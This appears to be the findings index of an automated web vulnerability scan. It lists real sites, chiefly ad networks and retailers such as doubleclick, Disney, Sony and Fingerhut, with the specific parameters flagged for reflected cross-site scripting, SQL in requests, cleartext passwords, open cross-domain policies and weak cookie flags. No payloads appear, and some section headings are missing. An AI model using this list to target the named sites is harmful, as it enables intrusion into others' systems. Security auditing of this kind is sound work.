1.2. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]
1.5. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mboxSession parameter]
1.6. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH [User-Agent HTTP header]
1.8. http://serv.adspeed.com/ad.php [name of an arbitrarily supplied request parameter]
1.9. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [widget_path parameter]
2.1. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]
4.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [REST URL parameter 1]
4.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 [REST URL parameter 1]
4.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 [REST URL parameter 1]
4.6. http://ad.doubleclick.net/adi/x1.dt/dt [REST URL parameter 1]
4.7. http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932 [REST URL parameter 1]
4.8. http://ad.doubleclick.net/adj/pmv.telegraph.tg/sponsored [REST URL parameter 1]
4.9. http://c7.zedo.com/utils/ecSet.js [v parameter]
5. Cross-site scripting (reflected)
5.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [campID parameter]
5.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [crID parameter]
5.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [partnerID parameter]
5.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pub parameter]
5.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pubICode parameter]
5.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [url parameter]
5.7. http://ad.turn.com/server/pixel.htm [fpid parameter]
5.8. http://ad.turn.com/server/pixel.htm [sp parameter]
5.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
5.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]
5.11. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
5.12. http://ahome.disney.go.com/globalelements/chrome.css [styleBackground parameter]
5.13. http://ahome.disney.go.com/globalelements/chrome.css [styleHover parameter]
5.14. http://ahome.disney.go.com/globalelements/chrome.css [styleMiddleLine parameter]
5.15. http://ahome.disney.go.com/globalelements/chrome.css [styleSelected parameter]
5.16. http://ahome.disney.go.com/globalelements/chrome.css [styleText parameter]
5.17. http://ahome.disney.go.com/globalelements/chrome.css [styleTextHover parameter]
5.18. http://ahome.disney.go.com/globalelements/chrome.css [styleTextSelected parameter]
5.19. http://choices.truste.com/ca [c parameter]
5.20. http://choices.truste.com/ca [h parameter]
5.21. http://choices.truste.com/ca [plc parameter]
5.22. http://choices.truste.com/ca [w parameter]
5.23. http://choices.truste.com/ca [zi parameter]
5.26. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]
5.27. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]
5.28. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [&qqElement parameter]
5.29. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]
5.30. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]
5.31. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 2]
5.32. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 3]
5.33. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 4]
5.34. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]
5.35. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 2]
5.36. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 3]
5.46. http://dcl2.wdpromedia.com/media/dcl_v0400/favicon.ico [REST URL parameter 1]
5.47. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]
5.48. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]
5.49. http://f.nexac.com/e/a-677/s-2140.xgi [na_kw parameter]
5.50. http://f.nexac.com/e/a-677/s-2140.xgi [na_title parameter]
5.51. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter]
5.52. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]
5.53. http://js.revsci.net/gateway/gw.js [csid parameter]
5.54. http://pastebin.com/favicon.ico [REST URL parameter 1]
5.55. http://pastebin.com/i/fixed.css [REST URL parameter 1]
5.56. http://pastebin.com/i/fixed.css [REST URL parameter 2]
5.57. http://pastebin.com/i/style.css [REST URL parameter 1]
5.58. http://pastebin.com/i/style.css [REST URL parameter 2]
5.59. http://pastebin.com/trends [REST URL parameter 1]
5.60. http://pastebin.com/trends [name of an arbitrarily supplied request parameter]
5.61. http://r.turn.com/server/pixel.htm [fpid parameter]
5.62. http://r.turn.com/server/pixel.htm [sp parameter]
5.63. http://s7d5.scene7.com/is/image/bluestembrands/4NL9200000010_A_999 [REST URL parameter 4]
5.64. http://s7d5.scene7.com/is/image/bluestembrands/4NP4530000010_A_999 [REST URL parameter 4]
5.65. http://s7d5.scene7.com/is/image/bluestembrands/4P2023GSG0010_VD_999 [REST URL parameter 4]
5.66. http://s7d5.scene7.com/is/image/bluestembrands/F0042_VA_999 [REST URL parameter 4]
5.67. http://s7d5.scene7.com/is/image/bluestembrands/F1900_VA_999 [REST URL parameter 4]
5.68. http://s7d5.scene7.com/is/image/bluestembrands/F1962_VB_999 [REST URL parameter 4]
5.69. http://s7d5.scene7.com/is/image/bluestembrands/F2553_WM1_400 [REST URL parameter 4]
5.70. http://s7d5.scene7.com/is/image/bluestembrands/F5676_VA_999 [REST URL parameter 4]
5.71. http://s7d5.scene7.com/is/image/bluestembrands/F6580_WM1_400 [REST URL parameter 4]
5.72. http://s7d5.scene7.com/is/image/bluestembrands/F8394_WM1_400 [REST URL parameter 4]
5.73. http://s7d5.scene7.com/is/image/bluestembrands/NA908_WM1_400 [REST URL parameter 4]
5.74. http://s7d5.scene7.com/is/image/bluestembrands/NB750_WVA_999 [REST URL parameter 4]
5.75. http://s7d5.scene7.com/is/image/bluestembrands/NC208_WM1_400 [REST URL parameter 4]
5.76. http://s7d5.scene7.com/is/image/bluestembrands/NC330_VA_999 [REST URL parameter 4]
5.77. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [REST URL parameter 4]
5.78. http://s7d5.scene7.com/is/image/bluestembrands/NC873_WM1_400 [REST URL parameter 4]
5.79. http://s7d5.scene7.com/is/image/bluestembrands/ND797_VA_999 [REST URL parameter 4]
5.80. http://s7d5.scene7.com/is/image/bluestembrands/ND877_A_999 [REST URL parameter 4]
5.81. http://s7d5.scene7.com/is/image/bluestembrands/NE440_WM1_400 [REST URL parameter 4]
5.82. http://s7d5.scene7.com/is/image/bluestembrands/NE682_WVA_999 [REST URL parameter 4]
5.83. http://s7d5.scene7.com/is/image/bluestembrands/NE967_WM1_400 [REST URL parameter 4]
5.84. http://s7d5.scene7.com/is/image/bluestembrands/NH642_VA_999 [REST URL parameter 4]
5.85. http://s7d5.scene7.com/is/image/bluestembrands/NI736_WVA_999 [REST URL parameter 4]
5.86. http://s7d5.scene7.com/is/image/bluestembrands/NJ310_WM1_400 [REST URL parameter 4]
5.87. http://s7d5.scene7.com/is/image/bluestembrands/NJ484_WVA_999 [REST URL parameter 4]
5.88. http://s7d5.scene7.com/is/image/bluestembrands/NJ847_VA_999 [REST URL parameter 4]
5.89. http://s7d5.scene7.com/is/image/bluestembrands/NK248_VC_999 [REST URL parameter 4]
5.90. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]
5.91. http://s7d5.scene7.com/is/image/bluestembrands/NL578_WVA_999 [REST URL parameter 4]
5.92. http://s7d5.scene7.com/is/image/bluestembrands/NM486_VC_999 [REST URL parameter 4]
5.93. http://s7d5.scene7.com/is/image/bluestembrands/NQ086_VA_999 [REST URL parameter 4]
5.94. http://s7d5.scene7.com/is/image/bluestembrands/NQ087_VA_999 [REST URL parameter 4]
5.95. http://s7d5.scene7.com/is/image/bluestembrands/NQ582_WVA_999 [REST URL parameter 4]
5.96. http://s7d5.scene7.com/is/image/bluestembrands/NR042_WVA_999 [REST URL parameter 4]
5.97. http://s7d5.scene7.com/is/image/bluestembrands/NR149_WVA_999 [REST URL parameter 4]
5.98. http://s7d5.scene7.com/is/image/bluestembrands/NS372_WVA_999 [REST URL parameter 4]
5.99. http://s7d5.scene7.com/is/image/bluestembrands/h6381_400 [REST URL parameter 4]
5.100. http://s7d5.scene7.com/is/image/bluestembrands/j7804_400 [REST URL parameter 4]
5.101. http://s7d5.scene7.com/is/image/bluestembrands/n4728_400 [REST URL parameter 4]
5.102. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]
5.103. http://serv.adspeed.com/ad.php [ht parameter]
5.104. http://serv.adspeed.com/ad.php [wd parameter]
5.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]
5.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]
5.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]
5.108. http://sony.links.channelintelligence.com/pages/prices.asp [ssku parameter]
5.109. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax [mbox parameter]
5.113. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
5.114. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
5.115. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
5.116. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
5.117. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
5.118. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
5.119. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
5.120. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
5.121. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
5.122. http://wow.weather.com/weather/wow/module/USNY0400 [config parameter]
5.123. http://wow.weather.com/weather/wow/module/USNY0400 [target parameter]
5.124. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm [Referer HTTP header]
5.125. http://f.nexac.com/e/a-677/s-2140.xgi [na_id cookie]
5.126. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]
6.1. http://0.gravatar.com/crossdomain.xml
6.2. http://6e8d64.r.axf8.net/crossdomain.xml
6.3. http://a.tribalfusion.com/crossdomain.xml
6.4. http://ad-emea.doubleclick.net/crossdomain.xml
6.5. http://ad.doubleclick.net/crossdomain.xml
6.6. http://ad.turn.com/crossdomain.xml
6.7. http://admeld.adnxs.com/crossdomain.xml
6.8. http://ahome.disney.go.com/crossdomain.xml
6.9. http://ajax.googleapis.com/crossdomain.xml
6.10. http://aperture.displaymarketplace.com/crossdomain.xml
6.11. http://api.ak.facebook.com/crossdomain.xml
6.12. http://b.scorecardresearch.com/crossdomain.xml
6.13. http://bh.contextweb.com/crossdomain.xml
6.14. http://c7.zedo.com/crossdomain.xml
6.15. http://cdn.gigya.com/crossdomain.xml
6.16. http://cdn.turn.com/crossdomain.xml
6.17. http://cdn5.tribalfusion.com/crossdomain.xml
6.18. http://ctix8.cheaptickets.com/crossdomain.xml
6.19. http://d.xp1.ru4.com/crossdomain.xml
6.20. http://dar.youknowbest.com/crossdomain.xml
6.21. http://feeds.delicious.com/crossdomain.xml
6.22. http://fingerhut.tt.omtrdc.net/crossdomain.xml
6.23. http://fls.doubleclick.net/crossdomain.xml
6.24. http://gannett.gcion.com/crossdomain.xml
6.25. http://gscounters.gigya.com/crossdomain.xml
6.26. http://i.w55c.net/crossdomain.xml
6.27. http://ib.adnxs.com/crossdomain.xml
6.28. http://idcs.interclick.com/crossdomain.xml
6.29. http://js.revsci.net/crossdomain.xml
6.30. http://metrics.fingerhut.com/crossdomain.xml
6.31. http://metrics.mcafee.com/crossdomain.xml
6.32. http://metrics.sonystyle.com/crossdomain.xml
6.33. http://metrics.us.playstation.com/crossdomain.xml
6.34. http://nexus2.ensighten.com/crossdomain.xml
6.35. http://p.brilig.com/crossdomain.xml
6.36. http://pix04.revsci.net/crossdomain.xml
6.37. http://pixel.33across.com/crossdomain.xml
6.38. http://pixel.invitemedia.com/crossdomain.xml
6.39. http://r.turn.com/crossdomain.xml
6.40. http://secure-us.imrworldwide.com/crossdomain.xml
6.41. http://serv.adspeed.com/crossdomain.xml
6.42. http://sony.links.channelintelligence.com/crossdomain.xml
6.43. http://sony.links.origin.channelintelligence.com/crossdomain.xml
6.44. http://sony.tcliveus.com/crossdomain.xml
6.45. http://sony.tt.omtrdc.net/crossdomain.xml
6.46. http://sonycomputerentertai.tt.omtrdc.net/crossdomain.xml
6.47. http://sync.mathtag.com/crossdomain.xml
6.48. http://t.invitemedia.com/crossdomain.xml
6.49. http://tags.bluekai.com/crossdomain.xml
6.50. http://ttwbs.channelintelligence.com/crossdomain.xml
6.51. http://turn.nexac.com/crossdomain.xml
6.52. http://usatoday1.112.2o7.net/crossdomain.xml
6.53. http://w88.go.com/crossdomain.xml
6.54. http://webtrends.telegraph.co.uk/crossdomain.xml
6.55. http://www.viddler.com/crossdomain.xml
6.56. http://adadvisor.net/crossdomain.xml
6.57. http://api.tweetmeme.com/crossdomain.xml
6.58. http://content.usatoday.com/crossdomain.xml
6.59. http://contextweb.usatoday.net/crossdomain.xml
6.60. http://cookex.amp.yahoo.com/crossdomain.xml
6.61. http://dcl.wdpromedia.com/crossdomain.xml
6.62. http://dcl2.wdpromedia.com/crossdomain.xml
6.63. http://disneycruise.disney.go.com/crossdomain.xml
6.64. http://feeds.bbci.co.uk/crossdomain.xml
6.65. http://googleads.g.doubleclick.net/crossdomain.xml
6.66. http://i.usatoday.net/crossdomain.xml
6.67. http://images.scanalert.com/crossdomain.xml
6.68. http://imawow.weather.com/crossdomain.xml
6.69. http://login.dotomi.com/crossdomain.xml
6.70. http://newsrss.bbc.co.uk/crossdomain.xml
6.71. http://optimized-by.rubiconproject.com/crossdomain.xml
6.72. http://pagead2.googlesyndication.com/crossdomain.xml
6.73. http://pubads.g.doubleclick.net/crossdomain.xml
6.74. http://s7d5.scene7.com/crossdomain.xml
6.75. http://static.ak.fbcdn.net/crossdomain.xml
6.76. http://travel.travelocity.com/crossdomain.xml
6.77. http://travel.usatoday.com/crossdomain.xml
6.78. http://webassets.scea.com/crossdomain.xml
6.79. http://wow.weather.com/crossdomain.xml
6.80. http://www.facebook.com/crossdomain.xml
6.81. http://www.fingerhut.com/crossdomain.xml
6.82. https://www.fingerhut.com/crossdomain.xml
6.83. http://www.mcafeesecure.com/crossdomain.xml
6.84. https://www.mcafeesecure.com/crossdomain.xml
6.85. http://www.telegraph.co.uk/crossdomain.xml
6.86. http://www.orbitz.com/crossdomain.xml
7. Silverlight cross-domain policy
7.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml
7.2. http://ad.doubleclick.net/clientaccesspolicy.xml
7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml
7.4. http://content.usatoday.com/clientaccesspolicy.xml
7.5. http://contextweb.usatoday.net/clientaccesspolicy.xml
7.6. http://i.usatoday.net/clientaccesspolicy.xml
7.7. http://metrics.fingerhut.com/clientaccesspolicy.xml
7.8. http://metrics.mcafee.com/clientaccesspolicy.xml
7.9. http://metrics.sonystyle.com/clientaccesspolicy.xml
7.10. http://metrics.us.playstation.com/clientaccesspolicy.xml
7.11. http://pixel.33across.com/clientaccesspolicy.xml
7.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
7.13. http://usatoday1.112.2o7.net/clientaccesspolicy.xml
7.14. http://w88.go.com/clientaccesspolicy.xml
8. Cleartext submission of password
8.1. http://disneycruise.disney.go.com/reservations/customize
8.2. http://localhost:50386/hoyt/Sitefinity/Startup
8.3. http://shoprunner.force.com/content/JsContentElementsGNC
8.4. http://shoprunner.force.com/content/JsContentElementsPET
8.5. http://www.passporterboards.com/forums/
8.6. http://www.viddler.com/file/7d63c65a/html5mobile/
9.1. http://api.ak.facebook.com/restserver.php [format parameter]
9.2. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 1]
9.3. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 2]
9.4. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 3]
9.5. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 1]
9.6. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 2]
9.7. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 3]
9.8. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
9.9. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
9.10. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
9.11. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
9.12. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]
9.13. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]
10. SQL statement in request parameter
10.1. https://store.playstation.com/external/index.vm
10.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
11.1. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard
11.2. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard
11.3. http://sales.liveperson.net/hc/71737897/
11.4. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax
11.5. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard
11.6. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard
12.1. https://www.mcafeesecure.com/
12.2. https://store.playstation.com/
12.3. https://www.fingerhut.com/
12.4. https://www.sonystyle.com/
13. Password field submitted using GET method
13.1. http://shoprunner.force.com/content/JsContentElementsGNC
13.2. http://shoprunner.force.com/content/JsContentElementsPET
14.1. http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93 [d parameter]
14.2. http://0.gravatar.com/avatar/6a69081c59ca58f4bb6f7a15970aa073 [d parameter]
14.4. http://b.scorecardresearch.com/r [d.c parameter]
14.5. http://bh.contextweb.com/bh/rtset [rurl parameter]
14.6. http://i.w55c.net/ping_match.gif [rurl parameter]
14.7. http://p.brilig.com/contact/bct [REDIR parameter]
14.8. http://pixel.invitemedia.com/pubmatic_sync [pubmatic_callback parameter]
14.9. http://r.nexac.com/e/getdata.xgi [ru parameter]
14.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]
14.11. http://sync.mathtag.com/sync/img [redir parameter]
15. Cookie scoped to parent domain
15.1. http://eval.bizrate.com/js/survey_126457_1.js
15.2. http://sony.links.origin.channelintelligence.com/pages/wl.asp
15.3. http://ttwbs.channelintelligence.com/
15.4. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5
15.5. http://a.tribalfusion.com/j.ad
15.6. http://action.media6degrees.com/orbserv/hbpix
15.7. http://ad.turn.com/server/ads.js
15.8. http://ad.turn.com/server/pixel.htm
15.9. http://admeld.adnxs.com/usersync
15.10. http://ads.revsci.net/adserver/ako
15.11. http://adserver.veruta.com/track.fcgi
15.12. http://ak1.abmr.net/is/images3.pacsun.com
15.13. http://ak1.abmr.net/is/tag.admeld.com
15.14. http://ak1.abmr.net/is/tag.contextweb.com
15.15. http://ak1.abmr.net/is/www.imiclk.com
15.17. http://b.scorecardresearch.com/b
15.18. http://b.scorecardresearch.com/r
15.19. http://bh.contextweb.com/bh/rtset
15.20. http://c7.zedo.com/utils/ecSet.js
15.21. http://cw-m.d.chango.com/m/cw
15.22. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830
15.23. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830
15.24. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
15.25. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830
15.26. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830
15.27. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/
15.29. http://data.adsrvr.org/map/cookie/contextweb
15.30. http://disneycruise.disney.go.com/reservations/customize
15.31. http://f.nexac.com/e/a-677/s-2140.xgi
15.32. http://https.edge.ru4.com/smartserve/ad
15.33. http://i.w55c.net/ping_match.gif
15.34. http://ib.adnxs.com/getuid
15.35. http://ib.adnxs.com/getuidnb
15.36. http://ib.adnxs.com/seg
15.37. http://id.google.com/verify/EAAAAI5KErmDGgY20W4qgKYVOXI.gif
15.38. http://id.google.com/verify/EAAAAI5WmUe7AMUDtVWgnHpi9vs.gif
15.39. http://id.google.com/verify/EAAAAK1jLqbLr1uikXFW8U9zAtc.gif
15.40. http://idcs.interclick.com/Segment.aspx
15.41. http://idpix.media6degrees.com/orbserv/hbpix
15.42. http://image2.pubmatic.com/AdServer/Pug
15.43. http://js.revsci.net/gateway/gw.js
15.44. http://leadback.advertising.com/adcedge/lb
15.45. http://media.fastclick.net/w/tre
15.46. http://odb.outbrain.com/utils/get
15.47. http://odb.outbrain.com/utils/ping.html
15.48. http://optimized-by.rubiconproject.com/a/dk.js
15.49. http://p.brilig.com/contact/bct
15.50. http://pix04.revsci.net/D08734/a1/0/0/0.gif
15.51. http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js
15.52. http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js
15.53. http://pix04.revsci.net/J06575/a4/0/0/pcx.js
15.54. http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js
15.55. http://pixel.33across.com/ps/
15.56. http://pixel.invitemedia.com/data_sync
15.57. http://pixel.mathtag.com/event/img
15.58. http://pixel.quantserve.com/pixel
15.59. http://pixel.rubiconproject.com/tap.php
15.60. http://pixel.rubiconproject.com/tap.php
15.63. http://r.turn.com/r/beacon
15.64. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF
15.65. http://r.turn.com/server/pixel.htm
15.67. http://segment-pixel.invitemedia.com/pixel
15.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
15.69. http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css
15.70. http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css
15.71. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
15.72. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
15.73. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
15.74. http://sync.mathtag.com/sync/img
15.75. http://t.invitemedia.com/track_imp
15.76. http://tag.contextweb.com/TagPublish/getad.aspx
15.77. http://tags.bluekai.com/site/2948
15.78. http://tags.bluekai.com/site/3358
15.79. http://www.imiclk.com/cgi/r.cgi
15.80. http://www.mcafeesecure.com/ads/1002/25
15.81. http://www.passporterboards.com/forums/
16. Cookie without HttpOnly flag set
16.1. http://disneycruise.disney.go.com/reservations/customize
16.2. http://eval.bizrate.com/js/survey_126457_1.js
16.6. http://sony.links.origin.channelintelligence.com/pages/wl.asp
16.7. http://ttwbs.channelintelligence.com/
16.8. http://us.playstation.com/uwps/TickerMessages
16.9. http://www.fingerhut.com/
16.10. http://www.fingerhut.com/fingerhut/css/sifr-config.jsp
16.11. http://www.fingerhut.com/includes/financial_snapshot.jsp
16.12. http://www.fingerhut.com/js/config_dhtml.jsp
16.13. http://www.fingerhut.com/js/financial-snapshot.jsp
16.14. http://www.fingerhut.com/js/persistent_cart.jsp
16.15. http://www.fingerhut.com/js/s_code.jsp
16.16. http://www.fingerhut.com/js/scene7/scene7.jsp
16.17. http://www.fingerhut.com/js/sifr.jsp
16.18. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp
16.19. https://www.fingerhut.com/js/persistent_cart.jsp
16.20. https://www.fingerhut.com/js/s_code.jsp
16.21. https://www.fingerhut.com/js/sifr.jsp
16.22. https://www.fingerhut.com/user/login.jsp
16.23. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
16.24. http://www.viddler.com/thumbnail/7d63c65a/
16.25. http://a.tribalfusion.com/j.ad
16.26. http://action.media6degrees.com/orbserv/hbpix
16.27. http://ad.turn.com/server/ads.js
16.28. http://ad.turn.com/server/pixel.htm
16.29. http://ad.yieldmanager.com/imp
16.30. http://ad.yieldmanager.com/pixel
16.31. http://ads.revsci.net/adserver/ako
16.32. http://adserver.veruta.com/track.fcgi
16.33. http://ak1.abmr.net/is/images3.pacsun.com
16.34. http://ak1.abmr.net/is/tag.admeld.com
16.35. http://ak1.abmr.net/is/tag.contextweb.com
16.36. http://ak1.abmr.net/is/www.imiclk.com
16.38. http://b.scorecardresearch.com/b
16.39. http://b.scorecardresearch.com/r
16.40. http://bh.contextweb.com/bh/rtset
16.41. http://c7.zedo.com/utils/ecSet.js
16.42. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1
16.43. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1
16.44. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1
16.45. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1
16.46. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1
16.47. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1
16.48. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1
16.49. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll
16.50. http://community.petco.com/n/blogs/blog.aspx
16.51. http://community.petco.com/n/pfx/forum.aspx
16.52. http://contextweb-match.dotomi.com/
16.53. http://ctix8.cheaptickets.com/dcssufut800000w4l0d2qm89z_3g4o/dcs.gif
16.54. http://cw-m.d.chango.com/m/cw
16.55. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830
16.56. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830
16.57. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
16.58. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830
16.59. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830
16.60. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/
16.62. http://data.adsrvr.org/map/cookie/contextweb
16.63. http://disneycruise.disney.go.com/reservations/customize
16.64. http://f.nexac.com/e/a-677/s-2140.xgi
16.65. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH
16.66. http://https.edge.ru4.com/smartserve/ad
16.67. http://i.w55c.net/ping_match.gif
16.68. http://idcs.interclick.com/Segment.aspx
16.69. http://idpix.media6degrees.com/orbserv/hbpix
16.70. http://image2.pubmatic.com/AdServer/Pug
16.71. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif
16.72. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif
16.73. http://js.revsci.net/gateway/gw.js
16.74. http://leadback.advertising.com/adcedge/lb
16.75. http://media.fastclick.net/w/tre
16.76. http://odb.outbrain.com/utils/get
16.77. http://odb.outbrain.com/utils/ping.html
16.78. http://optimized-by.rubiconproject.com/a/dk.js
16.79. http://p.brilig.com/contact/bct
16.80. http://pix04.revsci.net/D08734/a1/0/0/0.gif
16.81. http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js
16.82. http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js
16.83. http://pix04.revsci.net/J06575/a4/0/0/pcx.js
16.84. http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js
16.85. http://pixel.33across.com/ps/
16.86. http://pixel.invitemedia.com/data_sync
16.87. http://pixel.mathtag.com/event/img
16.88. http://pixel.quantserve.com/pixel
16.89. http://pixel.rubiconproject.com/tap.php
16.90. http://pixel.rubiconproject.com/tap.php
16.93. http://r.turn.com/r/beacon
16.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF
16.95. http://r.turn.com/server/pixel.htm
16.97. http://sales.liveperson.net/hc/46281118/
16.98. http://sales.liveperson.net/hc/53965383/
16.99. http://sales.liveperson.net/hc/71737897/
16.100. http://secureshopping.mcafee.com/
16.101. http://secureshopping.mcafee.com/css/home.css
16.102. http://secureshopping.mcafee.com/css/public.css
16.103. http://secureshopping.mcafee.com/images/banner_arrow.gif
16.104. http://secureshopping.mcafee.com/images/banner_mfes_signup.gif
16.105. http://secureshopping.mcafee.com/images/banner_sa.gif
16.106. http://secureshopping.mcafee.com/images/banner_tp_081610.gif
16.107. http://secureshopping.mcafee.com/images/bgarea_690x250_cccccc.png
16.108. http://secureshopping.mcafee.com/images/btn_compare_up.gif
16.109. http://secureshopping.mcafee.com/images/btn_seeit_up.gif
16.110. http://secureshopping.mcafee.com/images/category_blank.png
16.111. http://secureshopping.mcafee.com/images/category_blank_background.jpg
16.112. http://secureshopping.mcafee.com/images/category_bottom.png
16.113. http://secureshopping.mcafee.com/images/category_top.png
16.114. http://secureshopping.mcafee.com/images/favicon.ico
16.115. http://secureshopping.mcafee.com/images/footer-search-bg.gif
16.116. http://secureshopping.mcafee.com/images/footer-search-left.gif
